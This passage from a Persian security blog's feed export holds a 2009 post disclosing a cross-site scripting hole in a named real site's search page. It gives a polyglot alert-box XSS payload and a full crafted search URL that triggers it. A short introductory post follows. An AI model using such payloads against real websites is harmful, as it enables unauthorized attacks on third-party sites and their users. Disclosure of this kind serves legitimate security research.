zyn.com&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/strong&gt;&lt;span&gt;&lt;br /&gt;&lt;/span&gt;&lt;div dir="rtl" align="right"&gt;&lt;span&gt;&lt;br /&gt;&lt;/span&gt;&lt;div align="right"&gt;&lt;span&gt;سایت های زیادی مثل این وجود داره که اسکریپت زیر هک می شه ( توجه داسته باشید : بیشتر صفحات search این آسیب پذیری رو دارند .&lt;/span&gt;&lt;div dir="ltr" align="left"&gt;&lt;span&gt;&lt;span&gt;&lt;span&gt;&lt;span style="color: rgb(255, 204, 51);"&gt;Code :&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;span&gt;&lt;br /&gt;&lt;/span&gt;&lt;span&gt;&lt;span&gt;';alert(String.fromCharCode(88,83,83))//\';alert(String.fromCharCode(88,83,83))//&lt;/span&gt;&lt;span&gt;&lt;br /&gt;&lt;/span&gt;&lt;span&gt;";alert(String.fromCharCode(88,83,83))//\";alert(String.fromCharCode(88,83,83))//--&gt;"&gt;'&gt;&lt;/span&gt;&lt;span&gt;&lt;br /&gt;&lt;/span&gt;&lt;/span&gt;&lt;span&gt;&lt;span&gt;&lt;span&gt;&lt;span style="color: rgb(255, 204, 51);"&gt;Address :&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;span&gt;&lt;br /&gt;&lt;/span&gt;&lt;/span&gt;&lt;span&gt;http://www.zyn.com/sbir/sbres/sbcss.htm&lt;/span&gt;&lt;div align="center"&gt;&lt;span&gt;&lt;a href="http://www.zyn.com/cgi-shl/Zsearch2.pl?keywords=%27%3Balert%28String.fromCharCode%2888%2C83%2C83%29%29%2F%2F%5C%27%3Balert%28String.fromCharCode%2888%2C83%2C83%29%29%2F%2F%22%3Balert%28String.fromCharCode%2888%2C83%2C83%29%29%2F%2F%5C%22%3Balert%28String.fromCharCode%2888%2C83%2C83%29%29%2F%2F--%3E%3C%2FSCRIPT%3E%22%3E%27%3E%3CSCRIPT%3Ealert%28String.fromCharCode%2888%2C83%2C83%29%29%3C%2FSCRIPT%3E&amp;amp;indexname=sb-stall&amp;amp;display=20&amp;amp;search=Search+Solicitations"&gt;&lt;strong&gt;&lt;span&gt;آسیب پذیری&lt;/span&gt;&lt;/strong&gt;&lt;/a&gt;&lt;/span&gt;&lt;/div&gt;&lt;span&gt;&lt;br /&gt;&lt;/span&gt;&lt;div style="text-align: center;"&gt;&lt;a onblur="try {parent.deselectBloggerImageGracefully();} catch(e) {}" href="http://4.bp.blogspot.com/_HjC-UOu9N2Q/SlM-scjRAdI/AAAAAAAAADc/T67uzj7rWYY/s1600-h/1.gif"&gt;&lt;img src="http://4.bp.blogspot.com/_HjC-UOu9N2Q/SlM-scjRAdI/AAAAAAAAADc/T67uzj7rWYY/s400/1.gif" alt="" id="BLOGGER_PHOTO_ID_5355693315172925906" border="0" /&gt;&lt;/a&gt;&lt;br /&gt;&lt;a onblur="try {parent.deselectBloggerImageGracefully();} catch(e) {}" href="http://4.bp.blogspot.com/_HjC-UOu9N2Q/SlsaSTrpqWI/AAAAAAAAAF8/AB6XLUhBinc/s1600-h/sss.gif"&gt;&lt;img style="cursor: pointer; width: 400px; height: 241px;" src="http://4.bp.blogspot.com/_HjC-UOu9N2Q/SlsaSTrpqWI/AAAAAAAAAF8/AB6XLUhBinc/s400/sss.gif" alt="" id="BLOGGER_PHOTO_ID_5357905083510663522" border="0" /&gt;&lt;/a&gt;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;/div&gt;&lt;span&gt;&lt;span&gt;&lt;span style="color: rgb(0, 153, 0);"&gt;پاینده باد ایران&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;span&gt;&lt;br /&gt;&lt;/span&gt;&lt;/div&gt;&lt;/div&gt;&lt;br /&gt;&lt;br /&gt;&lt;/div&gt;&lt;/div&gt;&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/7813959987674775070-9126948356490022410?l=secanar.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://secanar.blogspot.com/feeds/9126948356490022410/comments/default' title='نظرات پيام'/><link rel='replies' type='text/html' href='http://secanar.blogspot.com/2009/07/xss-zyn.html#comment-form' title='0 نظر'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/7813959987674775070/posts/default/9126948356490022410'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/7813959987674775070/posts/default/9126948356490022410'/><link rel='alternate' type='text/html' href='http://secanar.blogspot.com/2009/07/xss-zyn.html' title='آسیب پذیری XSS : zyn.com'/><author><name>محمد جوانبخت</name><uri>http://www.blogger.com/profile/03809211800879576622</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='26' height='32' src='http://4.bp.blogspot.com/_HjC-UOu9N2Q/TE2ehVdjjjI/AAAAAAAAAI0/RZu7EEFMC1o/s1600-R/MJ_002.jpg'/></author><media:thumbnail xmlns:media='http://search.yahoo.com/mrss/' url='http://4.bp.blogspot.com/_HjC-UOu9N2Q/SlM-scjRAdI/AAAAAAAAADc/T67uzj7rWYY/s72-c/1.gif' height='72' width='72'/><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-7813959987674775070.post-5252495129896418278</id><published>2009-07-06T21:10:00.004+04:30</published><updated>2009-07-07T17:19:40.451+04:30</updated><title type='text'>آغاز به کار</title><content type='html'>&lt;div align="right" dir="rtl"&gt;&lt;br /&gt;&lt;span&gt;&lt;span&gt;&lt;span&gt;&lt;span&gt;با سلام به تمامی دوستان  از این پس در این وبلاگ  مطالب  پژوهشی  در زمینه ی علوم هک رو قرار می دم&lt;br /&gt;مطالب ارائه  شده در زمینه های مختلف علوم هکینگ و امنیت هستش&lt;br /&gt;&lt;br /&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;span&gt;&lt;span&gt;&lt;br /&gt;با سپاس&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/div&gt;&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/7813959987674775070-5252495129896418278?l=secanar.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://secanar.blogspot.com/feeds/5252495129896418278/comments/default' title='نظرات پيام'/><link rel='replies' type='text/html' href='http://secanar.blogspot.com/2009/07/blog-post.html#comment-form' title='0 نظر'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/7813959987674775070/posts/default/5252495129896418278'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/7813959987674775070/posts/default/5252495129896418278'/><link rel='alternate' type='text/html' href='http://secanar.blogspot.com/2009/07/blog-post.html' title='آغاز به کار'/><author><name>محمد جوانبخت</name><uri>http://www.blogger.com/profile/03809211800879576622</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='26' height='32' src='http://4.bp.blogspot.com/_HjC-UOu9N2Q/TE2ehVdjjjI/AAAAAAAAAI0/RZu7EEFMC1o/s1600-R/MJ_002.jpg'/></author><thr:total>0</thr:total></entry></feed>
